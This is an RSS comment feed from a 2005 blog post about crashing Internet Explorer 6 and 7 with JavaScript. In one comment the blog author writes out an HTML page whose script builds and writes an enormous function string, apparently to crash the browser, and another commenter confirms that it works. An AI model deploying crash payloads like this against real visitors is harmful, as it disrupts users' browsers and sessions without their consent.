<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Crash IE 6 and 7 on SP2 with Javascript</title>
	<atom:link href="http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/</link>
	<description>Internet &#38; Technology</description>
	<lastBuildDate>Sat, 21 Nov 2009 18:00:48 -0400</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Mike</title>
		<link>http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/#comment-12346</link>
		<dc:creator>Mike</dc:creator>
		<pubDate>Wed, 07 Dec 2005 00:02:22 +0000</pubDate>
		<guid isPermaLink="false">http://elliottback.com/wp/?p=1039#comment-12346</guid>
		<description>Yet another reason why Firefox is better than IE...</description>
		<content:encoded><![CDATA[<p>Yet another reason why Firefox is better than IE&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Elliott Back</title>
		<link>http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/#comment-5901</link>
		<dc:creator>Elliott Back</dc:creator>
		<pubDate>Mon, 17 Oct 2005 03:08:09 +0000</pubDate>
		<guid isPermaLink="false">http://elliottback.com/wp/?p=1039#comment-5901</guid>
		<description>You would have to create this javascript yourself, quite painfully I might add.  You can do it in javascript like so:

&lt;html&gt;
&lt;head&gt;
	&lt;title&gt;!!!&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
	var i = 0;
	var str = &#039;function test(){ return &#039;;
	while(i &lt; 2147483647 ){
		if(i &gt; 0)
			str += &#039; + &#039;; 
		str += i++;
	}
	
	str += &#039;}&#039;;
	document.write(str);
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</description>
		<content:encoded><![CDATA[<p>You would have to create this javascript yourself, quite painfully I might add.  You can do it in javascript like so:</p>
<p>&lt;html&gt;<br />
&lt;head&gt;<br />
	&lt;title&gt;!!!&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
	var i = 0;<br />
	var str = &#8216;function test(){ return &#8216;;<br />
	while(i &lt; 2147483647 ){<br />
		if(i &gt; 0)<br />
			str += &#8216; + &#8216;;<br />
		str += i++;<br />
	}</p>
<p>	str += &#8216;}&#8217;;<br />
	document.write(str);<br />
&lt;/script&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Elliot Lee</title>
		<link>http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/#comment-5899</link>
		<dc:creator>Elliot Lee</dc:creator>
		<pubDate>Mon, 17 Oct 2005 02:54:31 +0000</pubDate>
		<guid isPermaLink="false">http://elliottback.com/wp/?p=1039#comment-5899</guid>
		<description>Got an example page? IE gives me the Information Bar.</description>
		<content:encoded><![CDATA[<p>Got an example page? IE gives me the Information Bar.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Benny</title>
		<link>http://elliottback.com/wp/crash-ie-6-and-7-on-sp2-with-javascript/#comment-5010</link>
		<dc:creator>Benny</dc:creator>
		<pubDate>Thu, 06 Oct 2005 18:01:27 +0000</pubDate>
		<guid isPermaLink="false">http://elliottback.com/wp/?p=1039#comment-5010</guid>
		<description>The crashing pat does work hehe. i normally use Firefox so no problem for  &lt;a&gt;me&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>The crashing pat does work hehe. i normally use Firefox so no problem for  <a>me</a></p>
]]></content:encoded>
	</item>
</channel>
</rss>
